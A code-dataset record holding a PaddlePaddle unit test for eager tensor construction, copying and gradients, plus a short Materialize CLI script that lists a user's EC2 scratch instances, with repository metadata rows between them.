self.assertEqual(egr_tensor6.place.is_cpu_place(), True)
self.assertTrue(
np.array_equal(egr_tensor6.numpy(), egr_tensor5.numpy()))
egr_tensor7 = core.eager.EagerTensor(arr4, place, True)
self.assertEqual(egr_tensor7.persistable, True)
self.assertTrue("generated_tensor" in egr_tensor7.name)
self.assertEqual(egr_tensor7.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor7.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor7.stop_gradient, True)
self.assertTrue(egr_tensor7.place._equals(place))
self.assertTrue(np.array_equal(egr_tensor7.numpy(), arr4))
egr_tensor8 = core.eager.EagerTensor(egr_tensor6, place, "egr_tensor8")
self.assertEqual(egr_tensor8.persistable, False)
self.assertEqual(egr_tensor8.name, "egr_tensor8")
self.assertEqual(egr_tensor8.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor8.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor8.stop_gradient, True)
self.assertTrue(egr_tensor8.place._equals(place))
self.assertTrue(
np.array_equal(egr_tensor8.numpy(), egr_tensor5.numpy()))
egr_tensor9 = core.eager.EagerTensor(arr4, place, True, True)
self.assertEqual(egr_tensor9.persistable, True)
self.assertTrue("generated_tensor" in egr_tensor9.name)
self.assertEqual(egr_tensor9.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor9.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor9.stop_gradient, True)
self.assertTrue(egr_tensor9.place._equals(place))
self.assertTrue(np.array_equal(egr_tensor9.numpy(), arr4))
x = np.random.rand(3, 3).astype('float32')
t = paddle.fluid.Tensor()
t.set(x, paddle.fluid.CPUPlace())
egr_tensor10 = core.eager.EagerTensor(t, place)
self.assertEqual(egr_tensor10.persistable, False)
self.assertTrue("generated_tensor" in egr_tensor10.name)
self.assertEqual(egr_tensor10.shape, [3, 3])
self.assertEqual(egr_tensor10.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor10.stop_gradient, True)
self.assertTrue(egr_tensor10.place._equals(place))
self.assertTrue(np.array_equal(egr_tensor10.numpy(), x))
egr_tensor11 = core.eager.EagerTensor(t, place, "framework_constructed")
self.assertEqual(egr_tensor11.persistable, False)
self.assertTrue("framework_constructed" in egr_tensor11.name)
self.assertEqual(egr_tensor11.shape, [3, 3])
self.assertEqual(egr_tensor11.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor11.stop_gradient, True)
self.assertTrue(egr_tensor11.place._equals(place))
self.assertTrue(np.array_equal(egr_tensor11.numpy(), x))
egr_tensor12 = core.eager.EagerTensor(t)
self.assertEqual(egr_tensor12.persistable, False)
self.assertTrue("generated_tensor" in egr_tensor12.name)
self.assertEqual(egr_tensor12.shape, [3, 3])
self.assertEqual(egr_tensor12.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor12.stop_gradient, True)
self.assertTrue(egr_tensor12.place._equals(paddle.fluid.CPUPlace()))
self.assertTrue(np.array_equal(egr_tensor12.numpy(), x))
with self.assertRaisesRegexp(
ValueError, "The shape of Parameter should not be None"):
eager_param = EagerParamBase(shape=None, dtype="float32")
with self.assertRaisesRegexp(
ValueError, "The dtype of Parameter should not be None"):
eager_param = EagerParamBase(shape=[1, 1], dtype=None)
with self.assertRaisesRegexp(
ValueError,
"The dimensions of shape for Parameter must be greater than 0"):
eager_param = EagerParamBase(shape=[], dtype="float32")
with self.assertRaisesRegexp(
ValueError,
"Each dimension of shape for Parameter must be greater than 0, but received /*"
):
eager_param = EagerParamBase(shape=[-1], dtype="float32")
eager_param = EagerParamBase(shape=[1, 1], dtype="float32")
self.assertTrue(eager_param.trainable)
eager_param.trainable = False
self.assertFalse(eager_param.trainable)
with self.assertRaisesRegexp(
ValueError,
"The type of trainable MUST be bool, but the type is /*"):
eager_param.trainable = "False"
def test_constructor(self):
print("Test_constructor")
paddle.set_device("cpu")
place_list = [core.CPUPlace()]
if core.is_compiled_with_cuda():
place_list.append(core.CUDAPlace(0))
with _test_eager_guard():
for p in place_list:
self.constructor(p)
def test_copy_and_copy_to(self):
print("Test_copy_and_copy_to")
with _test_eager_guard():
paddle.set_device("cpu")
arr = np.ones([4, 16, 16, 32]).astype('float32')
arr1 = np.zeros([4, 16]).astype('float32')
arr2 = np.ones([4, 16, 16, 32]).astype('float32') + np.ones(
[4, 16, 16, 32]).astype('float32')
tensor = paddle.to_tensor(arr, core.VarDesc.VarType.FP32,
core.CPUPlace())
self.assertEqual(tensor.stop_gradient, True)
tensor.stop_gradient = False
print("Set persistable")
tensor.persistable = False
tensor1 = paddle.to_tensor(arr1, core.VarDesc.VarType.FP32,
core.CPUPlace())
tensor1.persistable = True
self.assertEqual(tensor1.stop_gradient, True)
self.assertTrue(np.array_equal(tensor.numpy(), arr))
print("Test copy_")
tensor.copy_(tensor1, True)
self.assertEqual(tensor.persistable, True)
self.assertEqual(tensor.shape, [4, 16])
self.assertEqual(tensor.dtype, core.VarDesc.VarType.FP32)
self.assertTrue(np.array_equal(tensor.numpy(), arr1))
print("Test _copy_to")
tensor2 = paddle.to_tensor(arr2, core.VarDesc.VarType.FP32,
core.CPUPlace())
self.assertTrue(np.array_equal(tensor2.numpy(), arr2))
self.assertTrue(tensor2.place.is_cpu_place())
tensor2.persistable = True
tensor2.stop_gradient = False
if core.is_compiled_with_cuda():
tensor3 = tensor2._copy_to(True, core.CUDAPlace(0))
self.assertTrue(np.array_equal(tensor3.numpy(), arr2))
self.assertTrue(tensor3.persistable, True)
self.assertTrue(tensor3.stop_gradient, True)
self.assertTrue(tensor3.place.is_gpu_place())
else:
tensor3 = tensor2._copy_to(True, core.CPUPlace())
self.assertTrue(np.array_equal(tensor3.numpy(), arr2))
self.assertTrue(tensor3.persistable, True)
self.assertTrue(tensor3.stop_gradient, True)
self.assertTrue(tensor3.place.is_cpu_place())
def test_properties(self):
print("Test_properties")
with _test_eager_guard():
paddle.set_device("cpu")
arr = np.ones([4, 16, 16, 32]).astype('float32')
tensor = paddle.to_tensor(arr, core.VarDesc.VarType.FP32,
core.CPUPlace())
self.assertEqual(tensor.shape, [4, 16, 16, 32])
tensor.name = 'tensor_name_test'
self.assertEqual(tensor.name, 'tensor_name_test')
self.assertEqual(tensor.persistable, False)
tensor.persistable = True
self.assertEqual(tensor.persistable, True)
tensor.persistable = False
self.assertEqual(tensor.persistable, False)
self.assertTrue(tensor.place.is_cpu_place())
self.assertEqual(tensor._place_str, 'CPUPlace')
self.assertEqual(tensor.stop_gradient, True)
tensor.stop_gradient = False
self.assertEqual(tensor.stop_gradient, False)
tensor.stop_gradient = True
self.assertEqual(tensor.stop_gradient, True)
def test_global_properties(self):
print("Test_global_properties")
self.assertFalse(core._in_eager_mode())
with _test_eager_guard():
self.assertTrue(core._in_eager_mode())
self.assertFalse(core._in_eager_mode())
def test_place_guard(self):
core._enable_eager_mode()
if core.is_compiled_with_cuda():
paddle.set_device("gpu:0")
with paddle.fluid.framework._dygraph_place_guard(core.CPUPlace()):
self.assertTrue(core.eager._get_expected_place().is_cpu_place())
else:
paddle.set_device("cpu")
with paddle.fluid.framework._dygraph_place_guard(core.CPUPlace()):
self.assertTrue(core.eager._get_expected_place().is_cpu_place())
core._disable_eager_mode()
class EagerParamBaseUsageTestCase(unittest.TestCase):
def test_print(self):
with _test_eager_guard():
linear = paddle.nn.Linear(3, 3, bias_attr=False)
print(linear.weight)
def test_copy(self):
with _test_eager_guard():
linear = paddle.nn.Linear(1, 3)
linear_copy = copy.deepcopy(linear)
linear_copy2 = linear.weight._copy_to(core.CPUPlace(), True)
self.assertTrue(
np.array_equal(linear.weight.numpy(),
linear_copy.weight.numpy()))
self.assertTrue(
np.array_equal(linear.weight.numpy(), linear_copy2.numpy()))
def func_fp16_initilaizer(self):
paddle.set_default_dtype("float16")
linear1 = paddle.nn.Linear(1, 3, bias_attr=False)
linear2 = paddle.nn.Linear(
1,
3,
bias_attr=False,
weight_attr=paddle.fluid.initializer.Uniform())
linear3 = paddle.nn.Linear(
1,
3,
bias_attr=False,
weight_attr=paddle.fluid.initializer.TruncatedNormalInitializer())
linear4 = paddle.nn.Linear(
1,
3,
bias_attr=False,
weight_attr=paddle.fluid.initializer.MSRAInitializer())
res = [
linear1.weight.numpy(), linear2.weight.numpy(),
linear3.weight.numpy(), linear4.weight.numpy()
]
paddle.set_default_dtype("float32")
return res
def test_fp16_initializer(self):
res1 = list()
res2 = list()
paddle.seed(102)
paddle.framework.random._manual_program_seed(102)
with _test_eager_guard():
res1 = self.func_fp16_initilaizer()
res2 = self.func_fp16_initilaizer()
for i in range(len(res1)):
self.assertTrue(np.array_equal(res1[i], res2[i]))
def func_layer_helper_base(self, value):
base = paddle.fluid.layer_helper_base.LayerHelperBase("test_layer",
"test_layer")
return base.to_variable(value).numpy()
def func_base_to_variable(self, value):
paddle.fluid.dygraph.base.to_variable(value)
def test_to_variable(self):
value = np.random.rand(4, 16, 16, 32).astype('float32')
res1 = None
res3 = None
with _test_eager_guard():
res1 = self.func_layer_helper_base(value)
res3 = self.func_base_to_variable(value)
res2 = self.func_layer_helper_base(value)
res4 = self.func_base_to_variable(value)
self.assertTrue(np.array_equal(res1, res2))
self.assertTrue(np.array_equal(res3, res4))
def test_backward_with_single_tensor(self):
arr4 = np.random.rand(4, 16, 16, 32).astype('float32')
egr_tensor12 = core.eager.EagerTensor(arr4, core.CPUPlace())
egr_tensor12.retain_grads()
arr = np.ones([4, 16, 16, 32]).astype('float32')
self.assertEqual(egr_tensor12.persistable, False)
self.assertTrue("generated_tensor" in egr_tensor12.name)
self.assertEqual(egr_tensor12.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor12.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor12.stop_gradient, True)
self.assertTrue(egr_tensor12.place._equals(paddle.fluid.CPUPlace()))
self.assertTrue(np.array_equal(egr_tensor12.numpy(), arr4))
self.assertTrue(np.array_equal(egr_tensor12.gradient(), None))
egr_tensor12.backward()
self.assertTrue(np.array_equal(egr_tensor12.gradient(), arr))
class EagerGuardTestCase(unittest.TestCase):
def test__test_eager_guard(self):
tracer = paddle.fluid.dygraph.tracer.Tracer()
with _test_eager_guard(tracer):
self.assertTrue(_in_eager_mode())
if __name__ == "__main__":
unittest.main()
| 46.686071 | 95 | 0.642679 |
import paddle.fluid.core as core
import paddle.fluid.eager.eager_tensor_patch_methods as eager_tensor_patch_methods
import paddle
import numpy as np
from paddle.fluid.framework import _test_eager_guard, EagerParamBase, _in_eager_mode
from paddle.fluid.data_feeder import convert_dtype
import unittest
import copy
class EagerScaleTestCase(unittest.TestCase):
def test_scale_base(self):
with _test_eager_guard():
paddle.set_device("cpu")
arr = np.ones([4, 16, 16, 32]).astype('float32')
tensor = paddle.to_tensor(arr, 'float32', core.CPUPlace())
print(tensor)
tensor = core.eager.scale(tensor, 2.0, 0.9, True, False)
for i in range(0, 100):
tensor = core.eager.scale(tensor, 2.0, 0.9, True, False)
print(tensor)
self.assertEqual(tensor.shape, [4, 16, 16, 32])
self.assertEqual(tensor.stop_gradient, True)
def test_retain_grad_and_run_backward(self):
with _test_eager_guard():
paddle.set_device("cpu")
input_data = np.ones([4, 16, 16, 32]).astype('float32')
data_eager = paddle.to_tensor(input_data, 'float32',
core.CPUPlace(), False)
grad_data = np.ones([4, 16, 16, 32]).astype('float32')
grad_eager = paddle.to_tensor(grad_data, 'float32', core.CPUPlace())
data_eager.retain_grads()
out_eager = core.eager.scale(data_eager, 1.0, 0.9, True, True)
self.assertFalse(data_eager.grad._is_initialized())
out_eager.backward(grad_eager, False)
self.assertTrue(data_eager.grad._is_initialized())
self.assertTrue(np.array_equal(data_eager.grad.numpy(), input_data))
def test_retain_grad_and_run_backward_raises(self):
with _test_eager_guard():
paddle.set_device("cpu")
input_data = np.ones([4, 16, 16, 32]).astype('float32')
data_eager = paddle.to_tensor(input_data, 'float32',
core.CPUPlace(), False)
grad_data = np.ones([4, 16, 16, 32]).astype('float32')
grad_data2 = np.ones([4, 16]).astype('float32')
grad_eager = paddle.to_tensor(grad_data, 'float32', core.CPUPlace())
grad_eager2 = paddle.to_tensor(grad_data2, 'float32',
core.CPUPlace())
data_eager.retain_grads()
out_eager = core.eager.scale(data_eager, 1.0, 0.9, True, True)
self.assertFalse(data_eager.grad._is_initialized())
with self.assertRaisesRegexp(
AssertionError,
"The type of grad_tensor must be paddle.Tensor"):
out_eager.backward(grad_data, False)
with self.assertRaisesRegexp(
AssertionError,
"Tensor shape not match, Tensor of grad_tensor /*"):
out_eager.backward(grad_eager2, False)
class EagerDtypeTestCase(unittest.TestCase):
def check_to_tesnsor_and_numpy(self, dtype, proto_dtype):
with _test_eager_guard():
arr = np.random.random([4, 16, 16, 32]).astype(dtype)
tensor = paddle.to_tensor(arr, dtype)
self.assertEqual(tensor.dtype, proto_dtype)
self.assertTrue(np.array_equal(arr, tensor.numpy()))
def test_dtype_base(self):
print("Test_dtype")
self.check_to_tesnsor_and_numpy('bool', core.VarDesc.VarType.BOOL)
self.check_to_tesnsor_and_numpy('int8', core.VarDesc.VarType.INT8)
self.check_to_tesnsor_and_numpy('uint8', core.VarDesc.VarType.UINT8)
self.check_to_tesnsor_and_numpy('int16', core.VarDesc.VarType.INT16)
self.check_to_tesnsor_and_numpy('int32', core.VarDesc.VarType.INT32)
self.check_to_tesnsor_and_numpy('int64', core.VarDesc.VarType.INT64)
self.check_to_tesnsor_and_numpy('float16', core.VarDesc.VarType.FP16)
self.check_to_tesnsor_and_numpy('float32', core.VarDesc.VarType.FP32)
self.check_to_tesnsor_and_numpy('float64', core.VarDesc.VarType.FP64)
self.check_to_tesnsor_and_numpy('complex64',
core.VarDesc.VarType.COMPLEX64)
self.check_to_tesnsor_and_numpy('complex128',
core.VarDesc.VarType.COMPLEX128)
class EagerTensorPropertiesTestCase(unittest.TestCase):
def constructor(self, place):
egr_tensor = core.eager.EagerTensor()
self.assertEqual(egr_tensor.persistable, False)
self.assertTrue("generated" in egr_tensor.name)
self.assertEqual(egr_tensor.shape, [])
self.assertEqual(egr_tensor.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor.stop_gradient, True)
egr_tensor0 = core.eager.EagerTensor(
core.VarDesc.VarType.FP32, [4, 16, 16, 32], "test_eager_tensor",
core.VarDesc.VarType.LOD_TENSOR, True)
self.assertEqual(egr_tensor0.persistable, True)
self.assertEqual(egr_tensor0.name, "test_eager_tensor")
self.assertEqual(egr_tensor0.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor0.dtype, core.VarDesc.VarType.FP32)
arr0 = np.random.rand(4, 16, 16, 32).astype('float32')
egr_tensor1 = core.eager.EagerTensor(arr0, place, True, False,
"numpy_tensor1", False)
self.assertEqual(egr_tensor1.persistable, True)
self.assertEqual(egr_tensor1.name, "numpy_tensor1")
self.assertEqual(egr_tensor1.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor1.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor1.stop_gradient, False)
self.assertTrue(egr_tensor1.place._equals(place))
self.assertTrue(np.array_equal(egr_tensor1.numpy(), arr0))
arr1 = np.random.randint(100, size=(4, 16, 16, 32), dtype=np.int64)
egr_tensor2 = core.eager.EagerTensor(arr1, place, False, True,
"numpy_tensor2", True)
self.assertEqual(egr_tensor2.persistable, False)
self.assertEqual(egr_tensor2.name, "numpy_tensor2")
self.assertEqual(egr_tensor2.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor2.dtype, core.VarDesc.VarType.INT64)
self.assertEqual(egr_tensor2.stop_gradient, True)
self.assertTrue(egr_tensor2.place._equals(place))
self.assertTrue(np.array_equal(egr_tensor2.numpy(), arr1))
arr2 = np.random.rand(4, 16, 16, 32, 64).astype('float32')
egr_tensor3 = core.eager.EagerTensor(arr2)
self.assertEqual(egr_tensor3.persistable, False)
self.assertTrue("generated_tensor" in egr_tensor3.name)
self.assertEqual(egr_tensor3.shape, [4, 16, 16, 32, 64])
self.assertEqual(egr_tensor3.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor3.stop_gradient, True)
self.assertTrue(
egr_tensor3.place._equals(
paddle.fluid.framework._current_expected_place()))
self.assertTrue(np.array_equal(egr_tensor3.numpy(), arr2))
egr_tensor3.stop_gradient = False
egr_tensor4 = core.eager.EagerTensor(egr_tensor3)
self.assertEqual(egr_tensor4.persistable, False)
self.assertTrue("generated_tensor" in egr_tensor4.name)
self.assertEqual(egr_tensor4.shape, egr_tensor3.shape)
self.assertEqual(egr_tensor4.dtype, egr_tensor3.dtype)
self.assertEqual(egr_tensor4.stop_gradient, True)
self.assertTrue(
egr_tensor4.place._equals(
paddle.fluid.framework._current_expected_place()))
self.assertTrue(
np.array_equal(egr_tensor4.numpy(), egr_tensor3.numpy()))
arr4 = np.random.rand(4, 16, 16, 32).astype('float32')
egr_tensor5 = core.eager.EagerTensor(arr4, place)
self.assertEqual(egr_tensor5.persistable, False)
self.assertTrue("generated_tensor" in egr_tensor5.name)
self.assertEqual(egr_tensor5.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor5.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor5.stop_gradient, True)
self.assertTrue(egr_tensor5.place._equals(place))
self.assertTrue(np.array_equal(egr_tensor5.numpy(), arr4))
egr_tensor6 = core.eager.EagerTensor(egr_tensor5, core.CPUPlace())
self.assertEqual(egr_tensor6.persistable, False)
self.assertTrue("generated_tensor" in egr_tensor6.name)
self.assertEqual(egr_tensor6.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor6.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor6.stop_gradient, True)
self.assertEqual(egr_tensor6.place.is_cpu_place(), True)
self.assertTrue(
np.array_equal(egr_tensor6.numpy(), egr_tensor5.numpy()))
egr_tensor7 = core.eager.EagerTensor(arr4, place, True)
self.assertEqual(egr_tensor7.persistable, True)
self.assertTrue("generated_tensor" in egr_tensor7.name)
self.assertEqual(egr_tensor7.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor7.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor7.stop_gradient, True)
self.assertTrue(egr_tensor7.place._equals(place))
self.assertTrue(np.array_equal(egr_tensor7.numpy(), arr4))
egr_tensor8 = core.eager.EagerTensor(egr_tensor6, place, "egr_tensor8")
self.assertEqual(egr_tensor8.persistable, False)
self.assertEqual(egr_tensor8.name, "egr_tensor8")
self.assertEqual(egr_tensor8.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor8.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor8.stop_gradient, True)
self.assertTrue(egr_tensor8.place._equals(place))
self.assertTrue(
np.array_equal(egr_tensor8.numpy(), egr_tensor5.numpy()))
egr_tensor9 = core.eager.EagerTensor(arr4, place, True, True)
self.assertEqual(egr_tensor9.persistable, True)
self.assertTrue("generated_tensor" in egr_tensor9.name)
self.assertEqual(egr_tensor9.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor9.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor9.stop_gradient, True)
self.assertTrue(egr_tensor9.place._equals(place))
self.assertTrue(np.array_equal(egr_tensor9.numpy(), arr4))
x = np.random.rand(3, 3).astype('float32')
t = paddle.fluid.Tensor()
t.set(x, paddle.fluid.CPUPlace())
egr_tensor10 = core.eager.EagerTensor(t, place)
self.assertEqual(egr_tensor10.persistable, False)
self.assertTrue("generated_tensor" in egr_tensor10.name)
self.assertEqual(egr_tensor10.shape, [3, 3])
self.assertEqual(egr_tensor10.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor10.stop_gradient, True)
self.assertTrue(egr_tensor10.place._equals(place))
self.assertTrue(np.array_equal(egr_tensor10.numpy(), x))
egr_tensor11 = core.eager.EagerTensor(t, place, "framework_constructed")
self.assertEqual(egr_tensor11.persistable, False)
self.assertTrue("framework_constructed" in egr_tensor11.name)
self.assertEqual(egr_tensor11.shape, [3, 3])
self.assertEqual(egr_tensor11.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor11.stop_gradient, True)
self.assertTrue(egr_tensor11.place._equals(place))
self.assertTrue(np.array_equal(egr_tensor11.numpy(), x))
egr_tensor12 = core.eager.EagerTensor(t)
self.assertEqual(egr_tensor12.persistable, False)
self.assertTrue("generated_tensor" in egr_tensor12.name)
self.assertEqual(egr_tensor12.shape, [3, 3])
self.assertEqual(egr_tensor12.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor12.stop_gradient, True)
self.assertTrue(egr_tensor12.place._equals(paddle.fluid.CPUPlace()))
self.assertTrue(np.array_equal(egr_tensor12.numpy(), x))
with self.assertRaisesRegexp(
ValueError, "The shape of Parameter should not be None"):
eager_param = EagerParamBase(shape=None, dtype="float32")
with self.assertRaisesRegexp(
ValueError, "The dtype of Parameter should not be None"):
eager_param = EagerParamBase(shape=[1, 1], dtype=None)
with self.assertRaisesRegexp(
ValueError,
"The dimensions of shape for Parameter must be greater than 0"):
eager_param = EagerParamBase(shape=[], dtype="float32")
with self.assertRaisesRegexp(
ValueError,
"Each dimension of shape for Parameter must be greater than 0, but received /*"
):
eager_param = EagerParamBase(shape=[-1], dtype="float32")
eager_param = EagerParamBase(shape=[1, 1], dtype="float32")
self.assertTrue(eager_param.trainable)
eager_param.trainable = False
self.assertFalse(eager_param.trainable)
with self.assertRaisesRegexp(
ValueError,
"The type of trainable MUST be bool, but the type is /*"):
eager_param.trainable = "False"
def test_constructor(self):
print("Test_constructor")
paddle.set_device("cpu")
place_list = [core.CPUPlace()]
if core.is_compiled_with_cuda():
place_list.append(core.CUDAPlace(0))
with _test_eager_guard():
for p in place_list:
self.constructor(p)
def test_copy_and_copy_to(self):
print("Test_copy_and_copy_to")
with _test_eager_guard():
paddle.set_device("cpu")
arr = np.ones([4, 16, 16, 32]).astype('float32')
arr1 = np.zeros([4, 16]).astype('float32')
arr2 = np.ones([4, 16, 16, 32]).astype('float32') + np.ones(
[4, 16, 16, 32]).astype('float32')
tensor = paddle.to_tensor(arr, core.VarDesc.VarType.FP32,
core.CPUPlace())
self.assertEqual(tensor.stop_gradient, True)
tensor.stop_gradient = False
print("Set persistable")
tensor.persistable = False
tensor1 = paddle.to_tensor(arr1, core.VarDesc.VarType.FP32,
core.CPUPlace())
tensor1.persistable = True
self.assertEqual(tensor1.stop_gradient, True)
self.assertTrue(np.array_equal(tensor.numpy(), arr))
print("Test copy_")
tensor.copy_(tensor1, True)
self.assertEqual(tensor.persistable, True)
self.assertEqual(tensor.shape, [4, 16])
self.assertEqual(tensor.dtype, core.VarDesc.VarType.FP32)
self.assertTrue(np.array_equal(tensor.numpy(), arr1))
print("Test _copy_to")
tensor2 = paddle.to_tensor(arr2, core.VarDesc.VarType.FP32,
core.CPUPlace())
self.assertTrue(np.array_equal(tensor2.numpy(), arr2))
self.assertTrue(tensor2.place.is_cpu_place())
tensor2.persistable = True
tensor2.stop_gradient = False
if core.is_compiled_with_cuda():
tensor3 = tensor2._copy_to(True, core.CUDAPlace(0))
self.assertTrue(np.array_equal(tensor3.numpy(), arr2))
self.assertTrue(tensor3.persistable, True)
self.assertTrue(tensor3.stop_gradient, True)
self.assertTrue(tensor3.place.is_gpu_place())
else:
tensor3 = tensor2._copy_to(True, core.CPUPlace())
self.assertTrue(np.array_equal(tensor3.numpy(), arr2))
self.assertTrue(tensor3.persistable, True)
self.assertTrue(tensor3.stop_gradient, True)
self.assertTrue(tensor3.place.is_cpu_place())
def test_properties(self):
print("Test_properties")
with _test_eager_guard():
paddle.set_device("cpu")
arr = np.ones([4, 16, 16, 32]).astype('float32')
tensor = paddle.to_tensor(arr, core.VarDesc.VarType.FP32,
core.CPUPlace())
self.assertEqual(tensor.shape, [4, 16, 16, 32])
tensor.name = 'tensor_name_test'
self.assertEqual(tensor.name, 'tensor_name_test')
self.assertEqual(tensor.persistable, False)
tensor.persistable = True
self.assertEqual(tensor.persistable, True)
tensor.persistable = False
self.assertEqual(tensor.persistable, False)
self.assertTrue(tensor.place.is_cpu_place())
self.assertEqual(tensor._place_str, 'CPUPlace')
self.assertEqual(tensor.stop_gradient, True)
tensor.stop_gradient = False
self.assertEqual(tensor.stop_gradient, False)
tensor.stop_gradient = True
self.assertEqual(tensor.stop_gradient, True)
def test_global_properties(self):
print("Test_global_properties")
self.assertFalse(core._in_eager_mode())
with _test_eager_guard():
self.assertTrue(core._in_eager_mode())
self.assertFalse(core._in_eager_mode())
def test_place_guard(self):
core._enable_eager_mode()
if core.is_compiled_with_cuda():
paddle.set_device("gpu:0")
with paddle.fluid.framework._dygraph_place_guard(core.CPUPlace()):
self.assertTrue(core.eager._get_expected_place().is_cpu_place())
else:
paddle.set_device("cpu")
with paddle.fluid.framework._dygraph_place_guard(core.CPUPlace()):
self.assertTrue(core.eager._get_expected_place().is_cpu_place())
core._disable_eager_mode()
class EagerParamBaseUsageTestCase(unittest.TestCase):
def test_print(self):
with _test_eager_guard():
linear = paddle.nn.Linear(3, 3, bias_attr=False)
print(linear.weight)
def test_copy(self):
with _test_eager_guard():
linear = paddle.nn.Linear(1, 3)
linear_copy = copy.deepcopy(linear)
linear_copy2 = linear.weight._copy_to(core.CPUPlace(), True)
self.assertTrue(
np.array_equal(linear.weight.numpy(),
linear_copy.weight.numpy()))
self.assertTrue(
np.array_equal(linear.weight.numpy(), linear_copy2.numpy()))
def func_fp16_initilaizer(self):
paddle.set_default_dtype("float16")
linear1 = paddle.nn.Linear(1, 3, bias_attr=False)
linear2 = paddle.nn.Linear(
1,
3,
bias_attr=False,
weight_attr=paddle.fluid.initializer.Uniform())
linear3 = paddle.nn.Linear(
1,
3,
bias_attr=False,
weight_attr=paddle.fluid.initializer.TruncatedNormalInitializer())
linear4 = paddle.nn.Linear(
1,
3,
bias_attr=False,
weight_attr=paddle.fluid.initializer.MSRAInitializer())
res = [
linear1.weight.numpy(), linear2.weight.numpy(),
linear3.weight.numpy(), linear4.weight.numpy()
]
paddle.set_default_dtype("float32")
return res
def test_fp16_initializer(self):
res1 = list()
res2 = list()
paddle.seed(102)
paddle.framework.random._manual_program_seed(102)
with _test_eager_guard():
res1 = self.func_fp16_initilaizer()
res2 = self.func_fp16_initilaizer()
for i in range(len(res1)):
self.assertTrue(np.array_equal(res1[i], res2[i]))
def func_layer_helper_base(self, value):
base = paddle.fluid.layer_helper_base.LayerHelperBase("test_layer",
"test_layer")
return base.to_variable(value).numpy()
def func_base_to_variable(self, value):
paddle.fluid.dygraph.base.to_variable(value)
def test_to_variable(self):
value = np.random.rand(4, 16, 16, 32).astype('float32')
res1 = None
res3 = None
with _test_eager_guard():
res1 = self.func_layer_helper_base(value)
res3 = self.func_base_to_variable(value)
res2 = self.func_layer_helper_base(value)
res4 = self.func_base_to_variable(value)
self.assertTrue(np.array_equal(res1, res2))
self.assertTrue(np.array_equal(res3, res4))
def test_backward_with_single_tensor(self):
arr4 = np.random.rand(4, 16, 16, 32).astype('float32')
egr_tensor12 = core.eager.EagerTensor(arr4, core.CPUPlace())
egr_tensor12.retain_grads()
arr = np.ones([4, 16, 16, 32]).astype('float32')
self.assertEqual(egr_tensor12.persistable, False)
self.assertTrue("generated_tensor" in egr_tensor12.name)
self.assertEqual(egr_tensor12.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor12.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor12.stop_gradient, True)
self.assertTrue(egr_tensor12.place._equals(paddle.fluid.CPUPlace()))
self.assertTrue(np.array_equal(egr_tensor12.numpy(), arr4))
self.assertTrue(np.array_equal(egr_tensor12.gradient(), None))
egr_tensor12.backward()
self.assertTrue(np.array_equal(egr_tensor12.gradient(), arr))
class EagerGuardTestCase(unittest.TestCase):
def test__test_eager_guard(self):
tracer = paddle.fluid.dygraph.tracer.Tracer()
with _test_eager_guard(tracer):
self.assertTrue(_in_eager_mode())
if __name__ == "__main__":
unittest.main()
| true | true |
f7260a0d88edffe8d516cb9fd3952c72cf448a40 | 1,339 | py | Python | misc/python/materialize/cli/scratch/mine.py | moyun/materialize | 58a59986abfa391375f5178d6fe742c5328155ac | [
"MIT"
] | 1 | 2021-04-02T20:41:35.000Z | 2021-04-02T20:41:35.000Z | misc/python/materialize/cli/scratch/mine.py | moyun/materialize | 58a59986abfa391375f5178d6fe742c5328155ac | [
"MIT"
] | 289 | 2021-02-12T22:25:15.000Z | 2022-03-27T22:12:28.000Z | misc/python/materialize/cli/scratch/mine.py | moyun/materialize | 58a59986abfa391375f5178d6fe742c5328155ac | [
"MIT"
] | 1 | 2021-07-09T11:51:59.000Z | 2021-07-09T11:51:59.000Z | # Copyright Materialize, Inc. and contributors. All rights reserved.
#
# Use of this software is governed by the Business Source License
# included in the LICENSE file at the root of this repository.
#
# As of the Change Date specified in that file, in accordance with
# the Business Source License, use of this software will be governed
# by the Apache License, Version 2.0.
import argparse
from typing import Callable
import boto3
from mypy_boto3_ec2.service_resource import Instance
from materialize.cli.scratch import check_required_vars
from materialize.scratch import launched_by, print_instances, tags, whoami
def configure_parser(parser: argparse.ArgumentParser) -> None:
check_required_vars()
parser.add_argument(
"who",
nargs="*",
help="Whose instances to show (defaults to yourself)",
default=[whoami()],
)
parser.add_argument("--all", help="Show all instances", action="store_true")
parser.add_argument("--output-format", choices=["table", "csv"], default="table")
def run(args: argparse.Namespace) -> None:
filter: Callable[[Instance], bool] = (
(lambda _i: True) if args.all else (lambda i: launched_by(tags(i)) in args.who)
)
ists = [i for i in boto3.resource("ec2").instances.all() if filter(i)]
print_instances(ists, args.output_format)
| 33.475 | 87 | 0.720687 |
import argparse
from typing import Callable
import boto3
